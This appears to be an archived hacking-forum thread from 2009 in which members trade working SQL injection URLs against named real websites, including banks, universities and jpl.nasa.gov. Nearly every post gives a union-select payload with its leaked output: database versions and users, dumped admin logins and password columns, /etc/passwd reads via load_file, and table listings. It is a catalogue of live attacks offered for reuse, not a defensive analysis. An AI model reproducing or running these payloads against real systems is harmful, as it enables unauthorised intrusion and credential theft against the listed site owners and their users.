View full version: SQL Injections
HAXTA4OK
23.06.2009, 22:44
http://tripuraproperty.com.np/index.php?page=detailinformation&id=-1+UnIoN+SelECT+1,2,CoNcAT_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19--
5.0.24-standard:tripurap@localhost:tripurap_tripura
HAXTA4OK
24.06.2009, 00:30
http://www.sewabank.com.np/photo_gallery.php?id=1'+and+substring(version(),1, 1)=5+--+
some bank or other :)
http://classifieds.business-opportunities.biz/ads/638%20union%20select%201,2,3,version(),database(), 6,user(),8--/
5.0.45-debian_1ubuntu3.1-log:bizop@172.19.0.147:bizop
pelligrim
24.06.2009, 13:42
http://www.black-cat.ru/cat/articles.php?id=-57+union+select+concat_ws(0x3a,version(),database( ),user())--
5.0.41-log:blackcat:blackcat@cub.mplik.ru
http://a-kentaur.ru/index.php?id=-107+union+select+concat_ws(0x3a,version(),database (),user())--
4.1.22-standard:kent_kent:kent_kent@localhost
Skofield
24.06.2009, 14:51
PR 5
http://em.tsu.edu/calendar/index.php?display=event&id=-579+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19/*
5.0.45-community:calendar:printers@em.tsu.edu
http://em.tsu.edu/calendar/index.php?display=event&id=-579+union+select+1,load_file(0x2f6574632f706173737 764),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
I don't remember whether this was posted already or not, the anti-repost checker isn't working
http://www.sit-trans.com/?action=customer_view_profile&id=-1717'+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,concat_Ws(0 x2b,use r(),version(),database()),11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35 ,36+--+
u_sittrans@localhost
5.0.44
sittrans
http://www.faberlic-msk.ru/index.php?act=fbcatalog&s=into&id=-1+union+select+1,2,3,concat_ws(char(58),version(), database(),user())--
5.1.29
liona@localhost
DezMond™
25.06.2009, 00:43
http://www.insightrussia.org/menu.php?id=-7'+UnIoN+SeLecT+1,database(),3,4,5,version()+--+
insight::4.1.22-lk-log
http://synclub.ru/menu.php?t=text&id=-22+UnIoN+SeLecT+username+from+user+--+
admin
http://jerusalemstonenyc.com/states.php?id=-23+union+select+1,version(),3,4+--+
4.1.22-standard
http://www.haircommercial.co.uk/auction/home.php?a=-203+union+select+1,2,3,4,5,concat_ws(0x3a3a,user_n ame,user_password),7+from+users+--+&f=0
http://rockpubs.planetrock.co.uk/details.php?pub_id=-52'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, concat_ws(0x3a3a,id,admin_id,password)+from+rockpu b_admin+/*+
PS the anti-repost checker isn't working((, sorry if there are reposts(
PR: 4
http://home.utk.ru/news.php?id=-100065+union+select+1,2,3,4,concat_ws(0x3a,version (),user(),database()),6,7,8,9,10,11
4.0.24-log:netutk@localhost:netutk
AlexSatter
25.06.2009, 13:22
http://www.foroporlamemoria.es/pl.php?id=-68+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11,12,13,14,15,16/*
5.0.32-Debian_7etch10-log:fmemoria_es@lqsym.nodo50.org:foroporlamemoria_ es
http://www.fashionmod.ru/pl.php?id=-52+union+select+1,2,concat_ws(0x2a,version(),user( ),database())
5.1.32-community-log*Dkfmxjh_fashion@91.195.124.11*Dkfmxjh_fashion
http://www.wspinanie.pl/biznes/product.pl.php?id=-11+union+selecT+1,2,3,4,5,6,7,8,9,10,concat_Ws(0x3 a,version(),user(),database()),12
5.0.51a-24+lenny1:wspinanie@localhost:wspinanie_1
http://www.wspinanie.pl/biznes/product.pl.php?id=-11+union+selecT+1,2,3,4,5,6,7,8,9,10,LOAD_FILE(0x2 f6574632f706173737764),12+from+mysql.user
http://www.wspinanie.pl/biznes/product.pl.php?id=-11+union+selecT+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3 a,user,password),12+from+mysql.user
http://www.turul.ro/forum/tt.php?id=-3+union+select+unhex(hex(version())),2,3/*
http://www.psyvlad.ru/pc/pp.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3
5.0.51a-community:psyvlad@localhost:db_psyvlad
http://www.polymedix.com/pr.php?id=-42+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10
5.0.67-msl-icd1-log:polymcms@localhost:polymedi_sys
http://www.ddjgraphics.com/pr.php?id=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4
5.0.45:root@localhost:ddj
http://www.ddjgraphics.com/pr.php?id=-4+union+select+1,LOAD_FILE(0x2f6574632f70617373776 4),3,4
http://www.clearbluebrandsolutions.com/pr.php?id=-15+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6
4.0.27-MAX-LOG:CLEARBLUE@208.109.138.41:CLEARBLUE
Skofield
25.06.2009, 16:36
http://www.elonat.com/buy_a_business_info.php?id=-59+union+select+1,2,3,4,5,concat_ws(0x3a,username, password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24+from+admin--
Database Version: 5.0.82-community
Database name: web29-elonat
User name: web29-elonat@localhost
jokester: look at the thread rules, they have changed; logins, passwords, hashes and admin panels are forbidden
http://www.vip-zalevsky.com/index.php?pageid=-2+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,10,11,12,13,14,15,16--
4.1.22-standart-log
http://www.cvetnik.com.ua/product.php?id=-34+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38--
cvetnik_cvetnik:4.1.22-standard-log:cvetnik_cvetnik@localhost
And from the same developer:
http://www.unimed.com.ua/index.php?pageid=-4+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9,10,11,12--
http://www.tsoklan.com/index.php?pageid=-340+union+select+1,2,3,concat_ws(0x3a,database(),v ersion(),user()),5,6,7,8,9,10,11,12--
http://www.uitb.com.ua/a-imglib/index.php?groupid=-8+union+select+concat_ws(0x3a,database(),version() ,user()),2,3,4,5,6--
http://www.maytravel.kiev.ua/index.php?pageid=-21+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7,8,9,10,11,12--
http://www.ekomtech.kiev.ua/a-news/news.php?id=-12+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7,8,9--
http://www.pres.com.ua/index.php?pageid=-5+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9,10,11,12--
http://www.mntext.com.ua/index.php?pageid=-4+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9,10,11,12--
http://www.fastflowerstoukraine.com/a-price/group.php?groupid=-10+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6--
http://www.kyivflorist.com/a-price/group.php?groupid=-2+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6--
http://juggler.artinact.com/a-news/news.php?id=-18+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5,6,7,8--
http://cubetriu.artinact.com/index.php?pageid=3+union+select+1,2,concat_ws(0x3a ,database(),version(),user()),4,5,6,7,8,9,10,11,12--
http://cdp.com.ua/index.php?pageid=6+union+select+1,2,concat_ws(0x3a ,database(),version(),user()),4,5,6,7,8,9,10,11,12--
http://www.ukrmusic.com.ua/?mid=3&music_line_id=339+union+select+1,2,3,4,5,6,concat_ ws(0x3a,database(),version(),user()),8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33--
http://www.duna.kiev.ua/index.php?pageid=9+union+select+1,2,concat_ws(0x3a ,database(),version(),user()),4,5,6,7,8,9,10,11,12--
And vip-zalevsky.com from Bramin is from the same series too =)
HAXTA4OK
25.06.2009, 22:53
http://www.ashokshakya.com.np./sahitya/geetfull.php?id=-1+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9--
ashok_root@localhost:4.1.22-standard:ashok_drishtikon
#########################################
http://www.gundemturkiye.org/detail.php?subject=&news=&date=1&dateop==&day1=1&month1=1&year1=1994&day2=1&month2=1&year2=1990&np=&&id=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7,8--
gundemturkiye@localhost:5.0.32-Debian_7etch6-log:www_gundemturkiye_org
$########################################
http://www.imhotep-org.eu/include/edi.php?id=1&np=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4--
4.0.27-max-log:dbo164644938@212.227.118.42:db164644938
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
http://lame.ws/rit/quote.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3,4--
5.0.24a-log:root@localhost:quotes
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
something about football, as far as I understood
http://swissscore.com/ws/seite.php?id=1'+union+select+1,concat_ws(0x3a,user (),database(),version()),3,4,5,6,7,8/*
web365@localhost:usr_web365_2:4.1.22-standard
%%%%%%%%%%%%%%%%%%%%%%%%%%%
http://urola.pre.wegetit.ws/servicios-detalle.php?id=1+and+substring(version(),1,1)=5--
#####################################
http://www.contax.ws/inicio.php?id=1&s=4+and+substring(version(),1,1)=5--
AlexSatter
26.06.2009, 11:25
http://www.hrgrp.com/releases/pr.php?id=-19+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8,9,10,11
4.0.27-log:hrgrp@192.168.1.51:hrgrp
http://www.emag.ru/pr.php?pr=-10+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10
5.0.45:emag@localhost:emag
http://asu.iate.obninsk.ru/pr.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase())
5.0.45:asu@localhost:asudb
http://www.artsawa.com/site/pr.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7
5.0.41-community-log:abouder_asawa@76.163.252.69:abouder_asawa
beerhack
26.06.2009, 17:31
http://www.drummusic.tv/product.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,USER NAME,PASSWORD,EMAIL),10,11,12,13,14,15+from+USERS/*
Database Version: 5.0.45-community
Database name: digivendor
User name: dmtv_public@localhost
M.W.N.N.
27.06.2009, 00:10
http://www.ce-sa.org/prod.php?id=6%27+union+select+1,2,concat_ws(0x3a,v ersion(),database(),user()),4,5,6,7,8,9,10/*
version():4.1.21-standard-log
database():cesaorg_cesa
user():cesaorg@localhost
beerhack
27.06.2009, 01:24
http://citynsk.tv/index.php?page=progr&id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4--
Database Version: 4.1.22-log
Database name: adeptor1_vizit
User name: adeptor1_vizit@localhost
HAXTA4OK
27.06.2009, 10:20
http://www.beatgoeson.se/help.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2--
4.0.17-standard:f1000686:f1000686@localhost
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
http://www.heleneschmitz.se/php/loadmeny.php?id=1+and+substring(version(),1,1)=4--
AlexSatter
27.06.2009, 13:09
http://www.telephototech.ru/news_podr.php?nid=-187+union+select+1,2,3,4,5,6,concat_ws(0x3a,versio n(),user(),database()),8,9,10/*
5.0.26-log:telephotot@localhost:telephotot
http://www.sputnik-altai.ru/hot.php?id=52+union+select+1,2,3,4,5,6,concat_ws(0 x3a,version(),user(),database())
5.0.77:sputnik@localhost:sputnik
http://www.roma-mia.de/stadtspaziergang-rom.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7
4.1.22-standard-log:db242003_2@local2:db242003_2
DezMond™
27.06.2009, 19:56
http://arcadeboomer.com/index.php?loadpage=./includes/articleblock.php&articlecat=-2+union+select+1,group_concat(table_name),3,4,5,6, 7,8,9,10+from+information_schema.tables+--+
http://diveinredsea.ru/news.php?p=-11'+union+select+1,pass,3,4+from+admin+/*+
http://israelecotours.com/news.php?p=-4'+union+select+1,2,pass,4,login,6,7+from+admin+/*+&u=1
http://www.fysiovanlith.nl/index.php?pid=-36+union+select+1,2,3,4,database(),6,7,8,9,10,11,1 2+/*+&hid=1
mey_cms
http://www.4x4site.nl/nieuwsitem.php?artid=-350+union+select+1,2,3,version(),5,6,7,8+/*+&titel=Range%20Rover%20convertible
4.1.21-standard-log
http://www.spamash.by/menu.php?id=-1+union+select+1,version(),3,4,5,6,7,8,9+/*+
5.0.45-Debian_1-log
http://www.cycling.by/news.php?form_id=-900+union+select+1,login,3,4,password,6,7+from+cms _system_users+/*+
HAXTA4OK
27.06.2009, 20:15
http://www.topp6.se/index.php?do=showrate&id=-1'+union+select+concat_ws(0x3a,version(),user(),da tabase()),2+--+
5.0.51a:topp6@193.138.217.37:topp6
Krist_ALL
27.06.2009, 22:59
http://eho-dv.com/news.details.php?id=-13168+Union+select+1,2,3,version(),5,6,7,8,9,10,11 ,12+
5.0.77-community
Skofield
28.06.2009, 01:42
http://ethicaltraveler.net/news_story.php?id=-181+union+select+1,version(),3,4/*
Database Version: 4.1.22-standard
Database name: imalawi_main
User name: imalawi_main%40localhost
M.W.N.N.
28.06.2009, 01:57
http://www.lonestar-sc.com/team_page.php?tid=506+Union+select+1,2,unhex(hex(c oncat_ws(0x3a,version(),database(),user()))),4,5,6 ,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user+lim it+1,1/*
version():4.1.18
database():lonestar_sc
user():dlyckman@dlyckman.securesites.net
The mysql.user table is there
http://www.timbermarket.ro/detalii_oferta.php?id_oferta=-138+UNION+SELECT+1,2,concat_ws(0x3a,version(),data base(),user(),@@version_compile_os),4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18--
Database Version: 5.0.45
Database name: c2timbermarket
User name: c2timbermarket@localhost
Os : redhat-linux-gnu
Skofield
28.06.2009, 15:27
PR 6
http://universitatestiu.url.edu/programa.php?id=-47+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29--
5.0.75-0ubuntu10.2 : UE2009 : ue2009@localhost
http://universitatestiu.url.edu/programa.php?id=-47+union+select+1,2,concat_ws(0x3a,login,password) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29+from+usuario--
beerhack
28.06.2009, 15:37
http://ludesign.curious.nl/icds2009/subpage.php?ID=-1+union+select+1,2,3,4,5,6,version(),8,9/*
Database Version: 4.1.20-log
Database name: icds2009
User name: icds2009@localhost
[PR 3]
http://www.satgo.com.tw/shop/shop.php?id=-202+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,8 4,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 ,101,102,103,104,105,106,107,108,109,110,111,112,1 13,114,115,116,117,118,119,120,121,122,123
4.0.21-log:satgocomtw:satgo.com.tw@localhost
Skofield
28.06.2009, 17:45
http://www.sacredheartclonakilty.ie/programmes.php?id=-3+union+select+1,concat_ws(0x3a,username,password) ,3+from+administration/*&language=russian
Database Version: 5.0.41-community
Database name: pmcshane_sacred_heart
User name: pmcshane_admin@localhost
beerhack
29.06.2009, 03:58
http://www.cezar.ua/a-articles/article.php?id=1+union+select+1,2,concat_ws(0x3a,l ogin,password,email),4,5,6,7,8,9,10,11,12,13+from+ cezar.aadm_users--
Database Version: 5.0.51a-24+lenny1-log
Database name: cezar
User name: u_cezar@localhost
pelligrim
29.06.2009, 06:44
http://www.avtomarket.ks.ua/index.php?action=auto&type=new&id=-31+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,database(),user()),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28--
5.0.51a-log:avtomarket_auto:avtomarket_marke@s8
AlexSatter
29.06.2009, 11:25
http://www.photolife.com/por.php?id=-481+union+select+1,2,3,unhex(hex(concat_ws(0x3a,ve rsion(),user(),database()))),5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35
4.1.7-standard:photolife@localhost:photolife
http://alkor.regioninfo.ru/news.php?id=-39+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12
5.0.45:alkorregi@localhost:alkorregi
http://www.altairest.ru/look_new.php?id=-18+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4
5.0.26-log:ayasuweb_rest@localhost:ayasuweb_rest
http://www.future-sense.co.za/pg.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conca t_ws(0x3a,version(),user(),database()),15,16,17
5.0.32-Debian_7etch10:futuresense@dedi49.jnb1.host-h.net:db_futuresense
http://www.calvaryefc.com/pages/pg.php?id=-76+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22
4.0.27-standard-log:dbo162563135@74.208.16.88:db162563135
0nep@t0p
29.06.2009, 18:39
http://www.calvin.edu/kuyers/journal.php?ID=-26+union+select+1,2,3,4,5,group_concat(table_name+ separator+0x2f),7+from+information_schema.tables+w here+table_schema+not+in('information_schema')--+
version: 5.0.67
http://www.gbcnv.edu/magic/article.php?op=Print&sid=-11+union+select+uid,2,uname,pass,umode,6,7,8+from+ users--+
version: 4.0.18
[53x]Shadow
29.06.2009, 23:23
jpl.nasa.gov
version: 4.0.27
user: JPLSite@localhost
http://www.jpl.nasa.gov/news/profiles.cfm?profile=-11%22+union+select+1,2,3,4,5,null,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,user_name,2,3,4,user_password,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4, 5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+login+limit+0,1/*
pelligrim
30.06.2009, 13:33
http://efmf.ru/frame.v2.shtml?song-meng.v2.php?song_id=50+union+select+1,2,3,concat_w s(0x3a,version(),database(),user()),5,6--
4.0.27-log:efmf:efmf@v25.valuehost.ru
http://michael-bg.com/products.php?sex_id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10,11--
4.0.27-standard:michael_michael:michael@localhost
Assembler
30.06.2009, 14:52
http://www.bienvenueaparis.fr/flat.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,group_concat(table_name),37,38,39 ,40,41,42,43,44,45,46%20from%20information_schema. tables--
version 5
Kimliksiz
30.06.2009, 17:49
http://www.demosgreatclone.com/youtubeclone/ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15--
Skofield
30.06.2009, 18:13
PR 4
http://cluster2.space.swri.edu/article.php?id=-1+union+select+1,2,version(),4,5,6,7,8/*
Database Version: 5.0.45
Database name: cluster2_management
User name: IDFSproc@localhost
Fata1ex
I'll continue your work.
http://www.depo.ba/page.php?id=2391+union+select+1,2,3,4,5,6+/*
How sweet. For some reason I decided that anyone could work out the columns and get output ) That's why they were left unfinished... besides, only 4 out of 9 were unfinished = ) Oh well
www.iddeea.gov.ba
http://www.iddeea.gov.ba/hr_vijesti.php?id=-191+union+select+1,concat(user(),0x3a,version()),3 ,4/*
root@80.65.66.99:5.0.45
There is output from mysql.user ;)
[TABLES]
user
user_info
users
db
user:
User
Password
user_info:
Full_name
Email
users:
email
db:
db
user
Users.Email:
...
Ctacok, you're on fire :) I would never have figured it out myself (:
http://ocenshik.mostpp.ru/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,%20user(),%2 0database(),%20version()),6,7,8+/*
root@zvm27.host.ru: ocenshik:4.0.27
http://www.donland.ru/news.asp?Id=1+or+1=(SELECT+TOP+1+TABLE_NAME%20+FRO M+INFORMATION_SCHEMA.TABLES)--
I'm bad at MSSQL injections, so don't judge ;)
beerhack
30.06.2009, 22:41
PR 6
http://www.eohsi.rutgers.edu/facultystaff/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,con cat_ws(0x3a,user,password),49,50,51,52,53,54,55,56 ,57,58,59,60+from+mysql.user/*
Database Version: 4.0.12
Database name: eohsi
User name: root@localhost
/etc/passwd
http://www.eohsi.rutgers.edu/facultystaff/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,loa d_file(0x2F6574632F706173737764),49,50,51,52,53,54 ,55,56,57,58,59,60/*
M.W.N.N.
01.07.2009, 03:21
http://www.nwaacc.org/soccer/news.php?id=667%27+union+select+1,2,3,4,5,concat_w s(0x3a,version(),database(),user()),7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
version():4.0.25
database():nwl-nwaacc
user():nwl-nwaacc@web06
HAXTA4OK
01.07.2009, 09:28
http://www.sovinservice.ru/aks_thomas.php?id=-23+union+select+concat_ws(0x3a,user(),database(),v ersion()),2,3,4,5,6--
sovin251@v45.valuehost.ru:sovin251:4.0.27-max-log
pelligrim
01.07.2009, 14:25
http://www.reproductionfabrics.com/shelf.php?ID=-3+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6--
5.0.45-log:mtconnect2:rfabrics@mercury.vcn.com
http://www.dala.com.ua/index.php?menu_id=-5+union+select+1,concat_ws(0x3a,version(),database (),user())--
5.0.45:dala_db:dala_1@localhost
PostgreSQL
albatros-film.com
[PR = 4]
http://www.albatros-film.com/list.phtml?genreid=27+and+1=cast((SELECT+version() ||chr(%20%2058)||current_user||chr(58)||current_da tabase())+as%20%20+int)--
version PostgreSQL 7.3.4 on i686-pc-linux-gnu, compiled by GCC 2.96
user postgres
database albatrosdb
30 columns
http://www.albatros-film.com/list.phtml?genreid=27+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30--
nfi.no
[PR = 6]
http://www.nfi.no/barnunge/filmstudieark/film.html?id=205+and+1=cast((SELECT+version()||chr (%20%2058)||current_user||chr(58)||current_databas e())+as%20%20+int)--
version PostgreSQL 7.3.4 on i386-unknown-freebsd4.3, compiled by GCC 2.95.3:
user wdnfi
database nfi2
http://ahta.ru/pages.php5?sym=products&show=prod&cid=-00000858+union+select+concat_ws(0x0b,user(),databa se(),version()),2
z73313_ahtasite@77.221.130.5
z73313_ahtasite
5.0.30-Debian_1-log
Tables:
http://ahta.ru/pages.php5?sym=products&show=prod&cid=-00000858+union+select+group_concat(table_name),2+f rom+information_schema.tables+group+by+table_schem a+limit+1,1
pages,user,brands,vac,news
Skofield
01.07.2009, 17:57
http://www.citadelhockey.com/archive/archive.php?id=-18+union+select+1,2,3,4,version(),6,7--
Database Version: 5.0.67-community
Database name: citadelh_roster09
User name: citadelh_coachsp@localhost
----------------------------------------------------------------------------------------------------------
http://www.ephnotes.org/index2.php?issue=-1204+union+select+1,2,3,4,5,version()/*
Database Version: 4.1.22-standard
Database name: alumsite_alumniatwilliams
User name: alumsite_ephcard@localhost
http://www.midlandairmuseum.co.uk/news.php?id=-16+union+select+1,2,3,4,version(),6,7
http://www.parkwood-holdings.co.uk/news.php?id=-43+union+select+1,2,group_concat(table_name),4,5,6 ,7,8,9,10+from+information_schema.tables
http://www.histonfc.co.uk/news.php?id=-205+union+select+1,2,3,4,5,6,7,8,version(),10,11
http://www.noise.co.uk/news.php?id=-10+union+select+1,version(),3
AlexSatter
01.07.2009, 23:49
http://www.kuzbass-edinros.ru/catalog/dela.php?id=-4+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5/*
5.0.32-Debian_7etch6-log:webadmin@localhost:edin
http://www.allstarsshop.ru/main.php?big=-94154+union+select+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,10,11,12,13,14,15
4.1.25:allstarsshop3@localhost:allstarsshop3
beerhack
02.07.2009, 12:10
PR 5
http://montserrat.edu/news/press-release-item.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10--
Database Version: 5.0.67-log
Database name: mcadb
User name: mcauser@vermouth.dreamhost.com
DezMond™
02.07.2009, 15:13
http://www.eilat4u.co.il/recommend.php?p=-3'+union+select+1,2,3,4,LOAD_FILE(0x2F7777772F6569 6C617434752F7777772F666F72756D2F696E6465782E706870 ),6,7+from+admin+/*+&u=1
http://israelecotours.com/news.php?p=-4'+union+select+1,2,pass,4,login,6,7+from+admin+/*+&u=1
http://www.redseasports.co.il/index.php?lang=3+union+select+1,unhex(hex(LOAD_FIL E(0x2F6574632F706173737764)))+from+mysql.user+/*+
http://www.zinccafe.com/menu.php?id=-1+union+select+1,2,3,4+from+adminmenus+--+
http://www.pribor.ru/main.php?show=news&id=-155+UnIon+SeLect+1,2,version(),4,5,6+/*+
4.0.22
http://www.deadsea-premier.ru/item.php?id=-40+UnIon+SeLect+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15+/*+
4.0.22
PS Sorry if there are reposts, the anti-repost checker isn't working(
jokester: Is Google not working either?
re: Google is silent
M.W.N.N.
02.07.2009, 17:49
"# What is Gelato?
# The global technical community dedicated to advancing Linux® on the Intel® Itanium® platform through collaboration, education, and leadership."
http://www.gelato.org/about/news_view.php?id=55+union+select+concat_ws(0x3a,ve rsion(),database(),user()),2,3,4+limit+1,1/*
version():4.0.24_Debian-10-log
database():newGelato
user():gelato@localhost
___
Kimliksiz
02.07.2009, 18:13
http://palindouble.com/gcards/getnewsitem.php?newsid=1+union+select+1,2,concat(u sername,char(45),userpass),4,5+FROM+gc_cardusers--
M.W.N.N.
02.07.2009, 18:31
http://yarra.ics.uci.edu/umich2/getdoc1.php?rid=21595+union+select+unhex(hex(conca t_ws(0x3a,version(),database(),user()))),2,3,4,5+l imit+1,1/*
version():4.1.14-standard
database():umich
user():root@localhost
The mysql.user table is there
AkyHa_MaTaTa
03.07.2009, 05:05
Dating site: you need to register:
http://www.narazdva.ru/?do=userinfo&id=-234++union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,group_concat(concat_ws(0x3a,login,pass word)+SEPARATOR+'%3Cbr%3E'),19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42, 43,44,45,46,47,48,49+from+veter142_narazdva.nrd_pa rtners
The shell gets uploaded in a very interesting way (at least it seems so to me).
http://www.911love.ru/?page=news&itm=25+union+select+1,2,3,4,5,concat_ws(0x3a,login ,password),7,8,9,10+from+www911love_main.911love_a ccess--+
---
http://www.vervefleet.com/quote.php?offer=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,data base(),version(),user()),10,11,12,13,14,15--
http://www.animeviews.com/quote.php?ID=-15+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5--
http://www.qcsgopc.org/quote.php?ID=-15+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5--
http://www.globalonlinecars.com/kuruma/quote.php?ID=-15+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19--
http://www.burocinternational.com/quote.php?id=-15+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7--
http://www.bestanecs.ru/quote.php?golos=minus&id=-15+union+select+1,2,3,concat_ws(0x3a,database(),ve rsion(),user()),5--
http://www.webblogme.com/forum/quote.php?id=-15+union+select+1,concat_ws(0x3a,database(),versio n(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36--
http://www.sofore.com/work.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7,8,9,10,11,12,13--
http://www.goncharova.info/work.php?id=-1+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4,5,6,7--
http://tm.perm.ru/work.php?id=1'+UNION+SELECT+1,2,3,4,concat_ws(0x3a ,database(),version(),user()),6/*
http://www.vysotnik.com.ua/work.php?id=1&fid=-6+union+select+concat_ws(0x3a,database(),version() ,user())--
http://www.hawkeng.com/work.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9,10,11--
http://joohye-choi.com/portfolio/work.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a,da tabase(),version(),user()),11,12,13,14,15,16,17,18 ,19,20,21--
http://www.jcinteractive.net/greencraft/viewvideo.php?cat_id=2&video_id=-3+union+select+1,2,concat_ws(0x3a,database(),versi on(),user()),4,5,6,7,8,9,10,11,12,13,14--
http://grapholineuae.com/work.php?id=-1+union+select+1,2,3,concat_ws(0x3a,database(),ver sion(),user()),5,6,7,8,9--
